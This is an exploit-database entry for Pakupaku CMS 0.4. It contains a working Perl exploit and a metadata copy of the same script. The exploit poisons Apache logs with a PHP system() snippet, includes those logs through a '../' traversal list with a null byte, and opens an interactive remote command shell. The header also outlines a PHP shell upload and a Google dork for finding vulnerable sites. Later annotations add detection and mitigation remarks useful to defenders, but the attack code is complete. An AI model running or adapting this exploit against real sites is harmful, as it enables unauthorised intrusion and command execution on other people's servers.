ID 1337DAY-ID-2099
Type zdt
Reporter GoLd_M
Modified 2007-08-29T00:00:00
Description
Exploit for unknown platform in category web applications
==========================================================
Pakupaku CMS <= 0.4 Remote File Upload / LFI Vulnerability
==========================================================
#!/usr/bin/perl
#########################################################################################
# Pakupaku CMS <= 0.4 Remote File Upload Vulnerability
# 1- [Path_Script]/index.php?page=Uploads
# 2- Upload GoLd-M.php <= [Php Shell]
# 3- [Path_Script]/uploads/GoLd-M.php <= [Php Shell]
# D.Script : http://heanet.dl.sourceforge.net/sourceforge/pakupaku/pakupaku-0.4.tar.gz #
#########################################################################################
# D0RK :http://www.google.com/search?client=opera&rls=en&q=Powered+by+Pakupaku+CMS&sourceid=opera&ie=utf-8&oe=utf-8
# Pakupaku CMS 0.4 (Local Inclusion) Remote Command Execution Exploit
use IO::Socket;
use LWP::Simple;
#ripped from rgod
# Candidate relative paths to Apache access/error logs under common install
# layouts. One entry is selected by numeric index (third command-line
# argument) and later placed in the `page` parameter of index.php.
# Defender note: every entry is a "../" traversal to a web-server log file.
# Per the advisory title (Local Inclusion), the technique presumably relies
# on the application including whatever `page` names, and on the PHP process
# being able to read the log. Resolving `page` against a fixed allow-list and
# keeping logs unreadable by the web/PHP user removes both preconditions.
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
# Banner: always printed, regardless of arguments.
print " ########################################################################\n";
print " # Pakupaku CMS 0.4 (Local Inclusion) Remote Command Execution Exploit #\n";
print " # Discovered by: GoLd_M = [Mahmood_ali] #\n";
print " # Thanx To : Tryag-Team & Asbmay's Group & bd0rk & All My Friends #\n";
print " ########################################################################\n\n";
# Argument check: with fewer than three arguments the script prints its usage
# text, lists each @apache entry next to its index, and exits without making
# any network connection.
if (@ARGV < 3)
{
print " ########################################################################\n";
print " # Usage: 3xp|017.pl [site] [Path] [apache_path] #\n";
print " # Apache Path: #\n";
print " ########################################################################\n";
$i = 0;
# Walks the list until the first false element (i.e. past the last entry).
while($apache[$i])
{ print "[$i] $apache[$i]\n";$i++;}
exit();
}
# Positional arguments: target host, path prefix of the application, and the
# numeric index into @apache used later to pick a log path.
$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];
# Stage 1 (log poisoning): one HTTP request is sent to port 80 whose request
# line and User-Agent header both carry the PHP snippet below; the status
# message indicates the intent is for the web server to write it to its logs.
# The response is not read; the socket is closed right after sending.
# Detection note: a literal "<?php" in the request URI or User-Agent field of
# an access/error log is a high-signal indicator of this technique and is
# worth alerting on.
print "[RST] Injecting some code in log files...\n";
# PHP snippet: clears the output buffer, passes $HTTP_COOKIE_VARS[cmd] to
# system(), then terminates the page with die.
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
# Stage 2 (inclusion loop): reads a line from STDIN, and for each line opens a
# new connection and requests index.php with `page` set to the selected
# @apache entry followed by "%00", then prints the raw HTTP response. The loop
# runs while the input does not match the pattern "q".
# Detection note: requests to index.php whose `page` value contains "../"
# sequences, a log-file name, or "%00" are the observable signature of this
# stage in access logs and WAF telemetry.
# Mitigation note: map `page` to a fixed allow-list of templates instead of a
# filesystem path, and confine PHP with open_basedir. Null bytes in paths are
# rejected by PHP from 5.3.4 onward, as far as this reviewer recalls, so the
# "%00" suffix would only matter on older runtimes; confirm against the
# deployed PHP version.
print "[RST] Shell!! write q to exit !\n";
print "[RST] IF not working try another apache path\n\n";
print "[shell] ";$cmd = <STDIN>;
while($cmd !~ "q") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";
print $socket "GET ".$path."index.php?page=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";
# Echo the server's full response (headers and body) to the terminal.
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[shell] ";
$cmd = <STDIN>;
}
# 0day.today [2018-04-04] #
{"published": "2007-08-29T00:00:00", "id": "1337DAY-ID-2099", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2018-04-04T17:31:17", "rev": 2}, "dependencies": {"references": [], "modified": "2018-04-04T17:31:17", "rev": 2}, "vulnersScore": -0.3}, "type": "zdt", "lastseen": "2018-04-04T17:31:17", "edition": 2, "title": "Pakupaku CMS <= 0.4 Remote File Upload / LFI Vulnerability", "href": "https://0day.today/exploit/description/2099", "modified": "2007-08-29T00:00:00", "bulletinFamily": "exploit", "viewCount": 7, "cvelist": [], "sourceHref": "https://0day.today/exploit/2099", "references": [], "reporter": "GoLd_M", "sourceData": "==========================================================\r\nPakupaku CMS <= 0.4 Remote File Upload / LFI Vulnerability\r\n==========================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#########################################################################################\r\n# Pakupaku CMS <= 0.4 Remote File Upload Vulnerability \r\n# 1- [Path_Script]/index.php?page=Uploads \r\n# 2- Upload GoLd-M.php <= [Php Shell] \r\n# 3- [Path_Script]/uploads/GoLd-M.php <= [Php Shell] \r\n# D.Script : http://heanet.dl.sourceforge.net/sourceforge/pakupaku/pakupaku-0.4.tar.gz #\r\n#########################################################################################\r\n# D0RK :http://www.google.com/search?client=opera&rls=en&q=Powered+by+Pakupaku+CMS&sourceid=opera&ie=utf-8&oe=utf-8\r\n# Pakupaku CMS 0.4 (Local Inclusion) Remote Command Execution Exploit\r\n\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n\r\n#ripped from 
rgod\r\n@apache=(\r\n\"../../../../../var/log/httpd/access_log\",\r\n\"../../../../../var/log/httpd/error_log\",\r\n\"../apache/logs/error.log\",\r\n\"../apache/logs/access.log\",\r\n\"../../apache/logs/error.log\",\r\n\"../../apache/logs/access.log\",\r\n\"../../../apache/logs/error.log\",\r\n\"../../../apache/logs/access.log\",\r\n\"../../../../apache/logs/error.log\",\r\n\"../../../../apache/logs/access.log\",\r\n\"../../../../../apache/logs/error.log\",\r\n\"../../../../../apache/logs/access.log\",\r\n\"../logs/error.log\",\r\n\"../logs/access.log\",\r\n\"../../logs/error.log\",\r\n\"../../logs/access.log\",\r\n\"../../../logs/error.log\",\r\n\"../../../logs/access.log\",\r\n\"../../../../logs/error.log\",\r\n\"../../../../logs/access.log\",\r\n\"../../../../../logs/error.log\",\r\n\"../../../../../logs/access.log\",\r\n\"../../../../../etc/httpd/logs/access_log\",\r\n\"../../../../../etc/httpd/logs/access.log\",\r\n\"../../../../../etc/httpd/logs/error_log\",\r\n\"../../../../../etc/httpd/logs/error.log\",\r\n\"../../.. 
/../../var/www/logs/access_log\",\r\n\"../../../../../var/www/logs/access.log\",\r\n\"../../../../../usr/local/apache/logs/access_log\",\r\n\"../../../../../usr/local/apache/logs/access.log\",\r\n\"../../../../../var/log/apache/access_log\",\r\n\"../../../../../var/log/apache/access.log\",\r\n\"../../../../../var/log/access_log\",\r\n\"../../../../../var/www/logs/error_log\",\r\n\"../../../../../var/www/logs/error.log\",\r\n\"../../../../../usr/local/apache/logs/error_log\",\r\n\"../../../../../usr/local/apache/logs/error.log\",\r\n\"../../../../../var/log/apache/error_log\",\r\n\"../../../../../var/log/apache/error.log\",\r\n\"../../../../../var/log/access_log\",\r\n\"../../../../../var/log/error_log\"\r\n);\r\n\r\nprint \" ########################################################################\\n\";\r\nprint \" # Pakupaku CMS 0.4 (Local Inclusion) Remote Command Execution Exploit #\\n\";\r\nprint \" # Discovered by: GoLd_M = [Mahmood_ali] #\\n\";\r\nprint \" # Thanx To : Tryag-Team & Asbmay's Group & bd0rk & All My Friends #\\n\";\r\nprint \" ########################################################################\\n\\n\";\r\n\r\nif (@ARGV < 3)\r\n{\r\n\r\n print \" ########################################################################\\n\";\r\n print \" # Usage: 3xp|017.pl [site] [Path] [apache_path] #\\n\";\r\n print \" # Apache Path: #\\n\";\r\n print \" ########################################################################\\n\";\r\n $i = 0;\r\n while($apache[$i])\r\n { print \"[$i] $apache[$i]\\n\";$i++;}\r\n exit();\r\n}\r\n\r\n$host=$ARGV[0];\r\n$path=$ARGV[1];\r\n$apachepath=$ARGV[2];\r\n\r\nprint \"[RST] Injecting some code in log files...\\n\";\r\n$CODE=\"<?php ob_clean();system(\\$HTTP_COOKIE_VARS[cmd]);die;?>\";\r\n$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"[RST] Could not connect to host.\\n\\n\";\r\nprint $socket \"GET \".$path.$CODE.\" HTTP/1.1\\r\\n\";\r\nprint $socket \"User-Agent: 
\".$CODE.\"\\r\\n\";\r\nprint $socket \"Host: \".$host.\"\\r\\n\";\r\nprint $socket \"Connection: close\\r\\n\\r\\n\";\r\nclose($socket);\r\nprint \"[RST] Shell!! write q to exit !\\n\";\r\nprint \"[RST] IF not working try another apache path\\n\\n\";\r\n\r\nprint \"[shell] \";$cmd = <STDIN>;\r\n\r\nwhile($cmd !~ \"q\") {\r\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"[RST] Could not connect to host.\\n\\n\";\r\n\r\n print $socket \"GET \".$path.\"index.php?page=\".$apache[$apachepath].\"%00&cmd=$cmd HTTP/1.1\\r\\n\";\r\n print $socket \"Host: \".$host.\"\\r\\n\";\r\n print $socket \"Accept: */*\\r\\n\";\r\n print $socket \"Connection: close\\r\\n\\n\";\r\n\r\n while ($raspuns = <$socket>)\r\n {\r\n print $raspuns;\r\n }\r\n\r\n print \"[shell] \";\r\n $cmd = <STDIN>;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-04-04] #"}
{}